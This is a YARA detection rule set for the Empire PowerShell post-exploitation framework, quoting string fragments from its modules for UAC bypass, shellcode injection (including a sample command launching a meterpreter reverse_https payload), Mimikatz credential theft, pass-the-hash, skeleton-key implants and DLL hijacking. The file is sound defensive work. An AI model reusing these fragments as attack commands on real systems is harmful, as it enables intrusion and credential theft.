/* Yara Rule Set Author: Florian Roth Date: 2015-08-07 Identifier: Empire Powershell Agent Comment: Reduced Subset */ rule Empire_Invoke_BypassUAC { meta: description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8" id = "8454d929-e184-5be1-b61f-4dfa8f44bdda" strings: $s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii $s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii $s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii $s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii condition: filesize < 1200KB and 3 of them } rule Empire_lib_modules_trollsploit_message { meta: description = "Empire - a pure PowerShell post-exploitation agent - file message.py" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5" id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5" strings: $s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii $s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii $s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii $s4 = "'Value' : 'Lost contact with the Domain Controller.'" fullword ascii condition: filesize < 10KB and 3 of them } rule Empire_Persistence { meta: description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f" id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9" strings: $s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii $s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii $s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii condition: filesize < 108KB and 1 of them } rule Empire_portscan { meta: description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97" id = "23a0f769-9155-5aa0-9200-2baf827bdda4" strings: $s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii $s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii condition: filesize < 14KB and all of them } rule Empire_Invoke_Shellcode { meta: description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438" id = "41788f71-cc99-50b3-bdc7-17b132ab2767" strings: $s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii $s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii $s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii condition: filesize < 100KB and 1 of them } rule Empire_Invoke_Mimikatz { meta: description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "c5481864b757837ecbc75997fa24978ffde3672b8a144a55478ba9a864a19466" id = "f7d6c1c4-2a24-54fd-b745-32d7894affc8" strings: $s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii $s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii $s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii condition: filesize < 2500KB and 2 of them } rule Empire_lib_modules_credentials_mimikatz_pth { meta: description = "Empire - a pure PowerShell post-exploitation agent - file pth.py" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "6dee1cf931e02c5f3dc6889e879cc193325b39e18409dcdaf987b8bf7c459211" id = "f954b7e8-e820-5111-ba8d-a9b9779381b0" strings: $s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii $s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii condition: filesize < 12KB and all of them } rule Empire_Write_HijackDll { meta: description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf" id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e" strings: $s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii $s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii $s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii condition: filesize < 500KB and 2 of them } rule Empire_skeleton_key { meta: description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f" id = "d508e09e-13e8-5866-bb5b-0d886f960bb5" strings: $s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii $s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii $s3 = "command = \"misc::skeleton\"" fullword ascii $s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii condition: filesize < 6KB and 2 of them } rule Empire_invoke_wmi { meta: description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "https://github.com/PowerShellEmpire/Empire" date = "2015-08-06" score = 70 hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d" id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54" strings: $s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii $s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii $s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii condition: filesize < 20KB and 2 of them }